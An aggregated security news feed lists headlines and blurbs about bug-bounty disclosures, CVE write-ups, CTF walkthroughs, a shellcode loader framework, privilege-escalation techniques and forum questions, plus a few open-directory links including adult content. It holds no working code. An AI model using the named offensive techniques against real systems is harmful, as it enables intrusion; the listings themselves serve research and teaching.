    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email addresses, or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
  • Open

    Finding vulnerabiities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40 pages paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    hey, guys, ’s I hope you doing well. Today I share some Linux priv esc resources That help you in solving CTF and in web-pentesting and… Continue reading on Medium »  ( 1 min )
    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers I am Aditya , Recently hunting around in a coaching site I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: entenda a diferença
    Como em um time de futebol, temos o ataque e a defesa, em cibersegurança a ideia é parecida. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and i need to find rop gadgets from vmlinux. This is not accessible in the target and as far as i understand uboot loads the vmlinux on boot, but this restricts me from easily finding the gadgets i need. Is there any resource you can suggest as I'm clearly missing something and my resesrch till now didn't give me clear answers. Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
    基于跨站跳转和文本数据异构图的GCN模型实现恶意网站识别 by ourren 在互联网交换中心检测反射放大 DDoS 攻击 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH V10 and this year I really want to be improved bling on my resume tbh. I am currently doing web mobile pos testing. Your help would be really appreciated in suggesting good value for money and information certificates. I know OSCP is there but I need more hands on for that which I am working on but in the mean time don't want to lose time. I have a potential interest in cloud security but also open to other fields and certification. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malwares. Maybe use Splunk to write alerts, queries etc to identify the malwares. (Problem is that it only got 60 days trial, need at least for 6 months) Should I be worried for VM escape, if I run these malware in a secure VM environment? What should be the main focus of this project. Run the malware then just identify them with alerts and write writeups? Would this idea be great for a university project for 6 months? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen windows event 1102 (The audit log was cleared) activity on a windows server that was performed by SYSTEM? It happened on a test vm I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup and a few 100 logs were deleted but they were future dated logs (which doesn't make sense). I'm sure the it's not a timezone issue, the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

    关于我学渗透的那档子事之Java反序列化-CB链
    这篇文章严格来说是我学java利用链的部分学习笔记。  ( 1 min )
    一篇关于PHP反序列化的文章
    一篇关于php反序列的文章  ( 1 min )
    FreeBuf 早报 | 多名 EA Sports FIFA 22玩家被黑;电子垃圾也是网络安全问题
    几名EA Sports FIFA 22的玩家疑似遭受黑客攻击,声称失去了对其个人EA和电子邮件账户的访问权限。  ( 1 min )
    专访阿里云SASE负责人:让办公安全更简单
    SASE是否真能实现Gartner预测的“可取代现有的网络和安全模型”,阿里云SASE是如何打造的,又能为企业带来哪些改变?  ( 1 min )
    欧洲刑警组织被勒令删除与犯罪调查无关的数据
    1月3日,欧洲数据保护监督机构要求欧洲刑警组织删除所存储的与刑事调查无显著关联的大量个人数据信息。
    多名EA Sports FIFA 22玩家被攻击
    越来越多的EA Sports FIFA 22玩家报告称他们的 EA 帐户被黑,无法访问他们的个人EA和电子邮件帐户,其中包括知名主播。  ( 1 min )
    Facebook推出“隐私中心”,教育用户了解数据收集和隐私选项
    迷宫般的菜单和晦涩的措辞,使人们不得不怀疑其在用户数据保护方面的有效性。  ( 1 min )
    “免疫”与“病毒”在网络时空之下的博弈对抗
    网络风险与“零号病人”同样,都是动态的研究课题,没那么容易一击即中,需要在寻找、判断、肯定、和自我否定中循序渐进,就是对“病毒”的认知过程。
    “脆弱”的车联网
    和快速奔跑的车联网产业相比,车联网安全显然是一个水磨工夫的活,车企必须学会慢下来,沉下去,方能真正解决车联网的安全问题。  ( 1 min )
    2021年挖矿木马趋势报告
    深信服威胁情报团队基于云端数据持续对活跃挖矿木马家族进行追踪,检测到了多起挖矿木马爆发事件,并从中分析总结出了一些挖矿木挖马的发展趋势。  ( 1 min )
    从我国现有法律法规谈重要数据定义
    2021年结束了,年底回忆了一下这一年来自己做了些什么,印象最深的应该就是数据安全这个词。  ( 1 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD , which ran XP, doesn’t boot anymore. I can access the files however. I’m trying to find a when a specific account was created on this drive. It was created from the original admin account , which also was deleted and replaced later on. . The user account files of the first admin account were saved , but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine. So it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would effect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text it downloaded something on my phone that I can’t find. My iPhone can’t make calls now.. I double clicked my home button during a call and something glitched.. I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on then call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, ​ I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a raspberry pi. ​ I have a laptop ready for deployment that will be connected via lan in the clients office, what would be the best way for me to remote into the laptop? In the past I've used Team viewer but that hasnt been great display wise, the reliability never dropped though which is the most important. ​ Would it be worth getting a VPS and configuring my own VPN using openvpn for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    got this message was I hacked? or is there something I am missing Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it. I cut out the number just in case I actually had this number at one point but what does this mean. I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook which I don't and he's in the IT field, and has google nest in our house he bought for our mother I'm thinking he's manipulating that to steal my credentials as well but I'm not sure. So long story short I cleaned up all possible security breaches my chump brother might have had control over and this happens I'm thinking he was on my Microsoft account because he jumps in my online COD Lobbys with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Accleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
    SecWiki周刊(第410期) by ourren Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁 by ourren 2021年侵犯个人信息十大典型案例 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    「网安知识大陆」1.0正式上线!
    能将优质内容聚集成一站式的「网安知识大陆」1.0正式版应运而生。
    FreeBuf早报 | 公安部公布个人信息犯罪十大典型案例;Facebook 推出隐私中心
    全国公安机关全年共破获侵犯公民个人信息案件9800余起,抓获犯罪嫌疑人1.7万名,并公布了2021年侵犯公民个人信息犯罪十大典型案例。  ( 1 min )
    实战SNMP服务攻击
    交换机安全配置中的SNMP服务  ( 1 min )
    「收藏版」大盘点:2021年政策法规、国标、报告白皮书
    本文全面整理了2021年出台的国内主要政策法规、部分国家标准以及主要机构的研究报告、白皮书等。  ( 1 min )
    漫话:等级保护之三员管理
    系统管理员、审计管理员、安全管理员不能集于一人之身,最好是三人分别担任。
    《上海市反间谍安全防范条例》发布,2022年1月1日正式施行
    《上海市反间谍安全防范条例》共七章三十五条,进一步完善了反间谍安全防范法律体系,依法维护国家安全。
    Night Sky,一种针对企业的新型勒索软件
    近日,安全研究人员发布警告称,一个名为“Night Sky”的新型勒索软件正再活跃,它以企业网络为目标,并在双重勒索攻击中窃取数据。  ( 1 min )
    在线预订服务平台 FlexBooker超370万账户数据遭泄露
    FlexBooker 建议用户保持警惕,并审查账户报表和信用报告中的可疑交易。  ( 1 min )
    Gin-Vue-admin垂直越权漏洞与代码分析-CVE-2022-21660
    用户之所以有机会越权,最终还是在代码上存在逻辑问题。  ( 3 min )
    因违反隐私规则,法国向谷歌和脸书开出2.1亿欧元巨额罚单
    法国分别对Facebook和谷歌处以1.5亿欧元和6000万欧元的罚款,理由是它们没有向用户提供拒绝cookie跟踪技术的简单选项。  ( 1 min )
    逆向分析教程(三)——快速查找指定代码的四种方法
    调试代码的时候,main()函数并不是直接位于可执行文件的EP位置上,出现在此的是开发工具(Visual C++)生成的启动函数。  ( 1 min )
    逆向分析教程(一)——调试代码
    该系列文章以准备入门逆向的小伙伴为对象进行总结。快来一起学习吧!  ( 1 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

  • Open

    searchsploit vs msfconsole exploit names
    Hi! Let's say I am looking for some webmin exploit through searchsploit: searchsploit webmin ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is is usable information to have these numbers to a person who is undefined. Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into solarwinds hack and I noticed that the malware called back home using a DHA DNS algorithm, but I'm struggling to understnad how did they hackers know which domain to buy/use for their malware? based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names but how does c2 and malware meet at a certain domain name? Especially if the malware generates 50k domains ? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK what’s the Reddit hack to wear you can’t send a private message because it thinks you have over 100 letters of tax this is currently going on I was banned for some thing I have no clue of why trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 2 min )
  • Open

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my finding in private pentest program that lead me takeover other user account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    بِسْمِ ٱللَّٰهِ ٱلرَّحْمَٰنِ ٱلرَّحِيمِ Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but i think is worth sharing, so lets get started. Continue reading on Medium »  ( 1 min )
  • Open

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302
  • Open

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )
  • Open

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )
  • Open

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

  • Open

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )
  • Open

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]
  • Open

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
    Get acquainted with the undocumented low-level yet powerful APIs from winternls and how to use the NtQuerySystemInformation function to get a list of all the processes running in the system. https://tbhaxor.com/windows-process-listing-using-ntquerysysteminformation/ submitted by /u/tbhaxor [link] [comments]
    Get expert training on advanced hunting
    submitted by /u/dmchell [link] [comments]
  • Open

    MSRC researcher recognition and CEO of DSPH at 18 years
    Hi everyone,  It was 7 January 2022 when I woke up from sleep I saw an email from MSRC i thought it must be related to the vulnerability… Continue reading on Medium »  ( 1 min )
    Research on Host Header Injection — Cyber Sapiens Internship Task-11
